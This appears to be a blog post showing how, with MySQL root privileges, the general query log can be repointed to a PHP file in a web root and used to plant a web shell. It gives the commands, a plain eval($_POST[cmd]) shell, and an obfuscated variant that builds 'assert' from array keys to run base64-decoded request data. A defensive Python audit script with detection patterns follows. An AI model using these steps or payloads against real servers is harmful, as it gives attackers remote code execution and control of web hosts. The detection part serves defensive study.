MySQL's side skills


This must be done with MySQL root privileges.

Check the general_log status

mysql> show variables like '%general%';
+------------------+----------------------------+
| Variable_name    | Value                      |
+------------------+----------------------------+
| general_log      | OFF                        |
| general_log_file | /var/lib/mysql/itaken.log |
+------------------+----------------------------+
2 rows in set (0.22 sec)

mysql>

Enable the MySQL query log and set the log file path

This log stores every SQL statement that is executed (including the text of the SQL statement itself).

mysql> set global general_log = on;
Query OK, 0 rows affected (0.00 sec)

mysql> set global general_log_file = '/var/www/html/1.php';
Query OK, 0 rows affected (0.00 sec)

mysql> show variables like '%general%';
+------------------+---------------------+
| Variable_name    | Value               |
+------------------+---------------------+
| general_log      | ON                  |
| general_log_file | /var/www/html/1.php |
+------------------+---------------------+
2 rows in set (0.00 sec)

mysql>

If the file 1.php does not exist, it will be created, so the directory must allow mysqld to create files; otherwise an error is reported:

mysql> set global general_log_file = '/var/www/html/1.php';
ERROR 29 (HY000): File '/var/www/html/1.php' not found (Errcode: 13 - Permission denied)

Execute a SQL query; it is recorded in the log

mysql> select '<?php eval($_POST[cmd]);?>';
+----------------------------+
| <?php eval($_POST[cmd]);?> |
+----------------------------+
| <?php eval($_POST[cmd]);?> |
+----------------------------+
1 row in set (0.00 sec)

mysql> SELECT "<?php $p = array('f'=>'a','pffff'=>'s','e'=>'fffff','lfaaaa'=>'r','nnnnn'=>'t');$a = array_keys($p);$_=$p['pffff'].$p['pffff'].$a[2];$_= 'a'.$_.'rt';$_(base64_decode($_REQUEST['username']));?>";
+--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+
| <?php $p = array('f'=>'a','pffff'=>'s','e'=>'fffff','lfaaaa'=>'r','nnnnn'=>'t');$a = array_keys($p);$_=$p['pffff'].$p['pffff'].$a[2];$_= 'a'.$_.'rt';$_(base64_decode($_REQUEST['username']));?> |
+--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+
| <?php $p = array('f'=>'a','pffff'=>'s','e'=>'fffff','lfaaaa'=>'r','nnnnn'=>'t');$a = array_keys($p);$_=$p['pffff'].$p['pffff'].$a[2];$_= 'a'.$_.'rt';$_(base64_decode($_REQUEST['username']));?> |
+--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+
1 row in set (0.00 sec)

mysql>
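The two things a defender can watch for here are exactly what the sessions above show: general_log_file being repointed to a path under a web root (with a server-executable extension), and query text carrying PHP tags into the log. The script below is an added example, not code from the original post; the web roots, data directory and sample rows are constructed assumptions to adjust per host.

```python
"""Audit MySQL general_log settings and query text for log-to-webroot abuse (added example)."""
import re
from pathlib import PurePosixPath

# Assumed paths for the audited host (adjust as needed); not from the original post.
WEB_ROOTS = ("/var/www", "/srv/http", "/usr/share/nginx/html")
DATADIR = "/var/lib/mysql"
WEB_EXECUTABLE_SUFFIXES = {".php", ".phtml", ".php5", ".jsp", ".asp", ".aspx"}

def _under(path, root):
    """True if path lies inside root (pure path comparison, no filesystem access)."""
    try:
        PurePosixPath(path).relative_to(root)
        return True
    except ValueError:
        return False

def audit_general_log(variables):
    """variables: dict built from SHOW VARIABLES LIKE '%general%' rows.
    Returns a list of finding strings; an empty list means nothing suspicious."""
    findings = []
    enabled = variables.get("general_log", "OFF").upper() == "ON"
    log_file = variables.get("general_log_file", "")
    if any(_under(log_file, r) for r in WEB_ROOTS):
        findings.append(f"general_log_file is inside a web root: {log_file}")
    elif log_file and not _under(log_file, DATADIR):
        findings.append(f"general_log_file is outside the data directory: {log_file}")
    suffix = PurePosixPath(log_file).suffix.lower()
    if suffix in WEB_EXECUTABLE_SUFFIXES:
        findings.append(f"general_log_file has a server-executable extension: {suffix}")
    if enabled and findings:
        findings.append("general_log is ON, so query text is being written to that file now")
    return findings

# Patterns worth alerting on in any query stream (general log, audit plugin, proxy).
SUSPICIOUS = [
    (re.compile(r"set\s+global\s+general_log_file\s*=", re.I), "general_log_file changed at runtime"),
    (re.compile(r"<\?php|<\?=", re.I), "PHP open tag in query text"),
    (re.compile(r"\b(eval|assert|system|passthru)\s*\(", re.I), "code-execution function in query text"),
]

def scan_queries(lines):
    """Return [(line_no, reason)] for each suspicious pattern found in the query lines."""
    return [(n, reason) for n, line in enumerate(lines, 1)
            for pat, reason in SUSPICIOUS if pat.search(line)]

SAMPLE_VARS = {"general_log": "ON", "general_log_file": "/var/www/html/1.php"}  # constructed
SAMPLE_LOG = [  # constructed lines in general_log format
    "2024-01-01T10:00:00.000000Z    5 Query    show variables like '%general%'",
    "2024-01-01T10:00:01.000000Z    5 Query    set global general_log_file = '/var/www/html/1.php'",
    "2024-01-01T10:00:02.000000Z    5 Query    select '<?php eval($_POST[cmd]);?>'",
]

if __name__ == "__main__":
    for f in audit_general_log(SAMPLE_VARS):
        print("FINDING:", f)
    for n, r in scan_queries(SAMPLE_LOG):
        print(f"line {n}: {r}")
```

The PHP-tag check also catches the obfuscated second payload above, which deliberately avoids any literal function name.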

Original article: Writing a shell via the log using SQL statements


References


Author: Itaken
Reprint policy: Unless otherwise stated, all articles in this blog use the CC BY 4.0 reprint policy. If reproduced, please indicate the source, Itaken!